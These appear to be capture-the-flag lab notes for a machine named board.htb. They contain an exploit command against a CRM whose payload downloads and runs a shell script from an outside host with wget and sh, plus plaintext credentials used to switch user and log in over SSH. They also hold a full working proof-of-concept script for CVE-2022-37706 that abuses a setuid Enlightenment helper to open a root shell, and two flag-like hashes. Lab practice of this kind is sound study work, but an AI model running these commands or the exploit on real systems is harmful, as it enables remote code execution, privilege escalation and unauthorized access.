
- Port 80 and 22 are open
python3 cve-2023-44197.py http://crm.board.htb admin admin "wget http://10.10.14.5/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh"

dolibarrowner
serverfun2$2023!!
su larissa
serverfun2$2023!!

ssh larissa@10.10.11.11
larissa is in the adm group (which has group read access to the audit logs listed below); sudo version is 1.8.31
/var/log/apache2/error.log
-rw-r----- 1 root adm 5104875 Jul 18 18:25 /var/log/audit/audit.log
-r--r----- 1 root adm 8388711 Jul 18 18:04 /var/log/audit/audit.log.3
-r--r----- 1 root adm 8393041 Jul 18 18:23 /var/log/audit/audit.log.1
-r--r----- 1 root adm 8388641 Jul 18 18:04 /var/log/audit/audit.log.2
-r--r----- 1 root adm 8388933 Jul 18 18:03 /var/log/audit/audit.log.4
#!/bin/bash
# Public proof-of-concept for CVE-2022-37706, a local privilege escalation
# through the setuid helper enlightenment_sys, kept here as lab notes.
#
# Visible behaviour: find a setuid enlightenment_sys, stage two paths under
# /tmp, then run the helper with /bin/mount arguments whose source path
# contains a ';'.
#
# NOTE(review): the flaw itself (how the helper handles a path that begins
# with /dev/..) lives in the binary, not in this script -- confirm the details
# against the vendor advisory.
#
# Defender notes:
#   - Mitigation: update Enlightenment to a patched release, or remove the
#     package / its setuid bit on hosts that do not need the desktop.
#   - Detection: filesystem-wide searches for setuid files, directory names
#     containing ';' under /tmp, and enlightenment_sys being executed with
#     /bin/mount arguments by a non-root user.
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# Search the whole filesystem for a file named enlightenment_sys that has the
# setuid bit (-perm -4000); errors are discarded and only the first hit is kept.
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
# No setuid helper found: report and exit non-zero.
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
# Directory used as the mount-point argument (written as /tmp///net below).
mkdir -p /tmp/net
# Creates a directory literally named ';' under /tmp (reached via /dev/..),
# with tmp/exploit beneath it, so the crafted source path exists on disk.
mkdir -p "/dev/../tmp/;/tmp/exploit"
# /tmp/exploit is a separate regular file holding the single line "/bin/sh",
# made executable for every user.
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
# Runs the setuid helper with a /bin/mount command line; the source path is the
# ';'-bearing path created above and uid= is filled from the caller's id.
# NOTE(review): presumably the helper hands this string to a shell, so the ';'
# acts as a command separator and /tmp/exploit runs with the helper's
# privileges -- not verifiable from this script alone.
# ${file} and $(id -u) are unquoted in the original.
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
05e9699519d4ebeea933cfea6c77e73c
df402af93e07d9cfaa16e0a38545bf7f